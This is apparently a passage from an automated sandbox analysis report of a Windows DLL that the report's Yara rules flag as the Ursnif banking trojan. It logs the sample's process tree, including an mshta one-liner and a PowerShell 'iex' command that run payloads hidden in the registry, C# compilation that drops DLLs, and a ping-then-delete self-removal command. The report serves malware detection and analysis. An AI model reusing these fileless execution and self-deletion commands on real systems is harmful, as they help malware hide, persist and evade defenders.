Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline' Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20211008 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uz4s1q2p.5j2.ps1 Jump to behavior
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@54/38@14/8
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B04A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_00B04A03
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{9C6EB822-4BB9-2E3E-B590-AF42B9C45396}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{B864CE7C-B760-AAC6-016C-DB7EC5603F92}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6032BFB6-3FC2-92EA-C994-E3E60D08C77A}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_01
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{8CBE6080-7B68-9E43-6580-DFB269B48306}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_01
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: uT9rwkGATJ.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: uT9rwkGATJ.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\Toward\clock-sit\Only_Girl\Teach.pdb source: loaddll32.exe, 00000000.00000002.823565020.000000006E1D2000.00000002.00020000.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
Source: Binary string: d.pdbp source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\uio4qdnj.pdb~U source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hiiw3gsl.pdb source: powershell.exe, 0000001B.00000002.812366311.0000029704754000.00000004.00000001.sdmp
Source: uT9rwkGATJ.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: uT9rwkGATJ.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: uT9rwkGATJ.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: uT9rwkGATJ.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: uT9rwkGATJ.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A21A3 push ecx; ret 0_2_6E1A21B3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A2150 push ecx; ret 0_2_6E1A2159
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B0ABE0 push ecx; ret 0_2_00B0ABE9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B0AF13 push ecx; ret 0_2_00B0AF23
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00670B91 push edi; retf 0_2_00670B96
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B56106 push ecx; mov dword ptr [esp], 00000002h 0_2_00B56107
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00B7A283 push ecx; ret 0_2_00B7A293
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_00570B91 push edi; retf 2_2_00570B96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02DA0B91 push edi; retf 3_2_02DA0B96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0336A283 push ecx; ret 3_2_0336A293
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_03346106 push ecx; mov dword ptr [esp], 00000002h 3_2_03346107
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02BDABE0 push ecx; ret 4_2_02BDABE9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02BDAF13 push ecx; ret 4_2_02BDAF23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00840B91 push edi; retf 4_2_00840B96
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1A1DE5 LoadLibraryA,GetProcAddress, 0_2_6E1A1DE5
PE file contains an invalid checksum
Source: hiiw3gsl.dll.31.dr Static PE information: real checksum: 0x0 should be: 0x20ab
Source: uio4qdnj.dll.29.dr Static PE information: real checksum: 0x0 should be: 0x7dd1
Source: uT9rwkGATJ.dll Static PE information: real checksum: 0xa274a should be: 0xa6bea
Source: ebytp2em.dll.35.dr Static PE information: real checksum: 0x0 should be: 0x85fb
Source: hjljqxud.dll.32.dr Static PE information: real checksum: 0x0 should be: 0xb2f3
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ebytp2em.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\uio4qdnj.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\hjljqxud.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
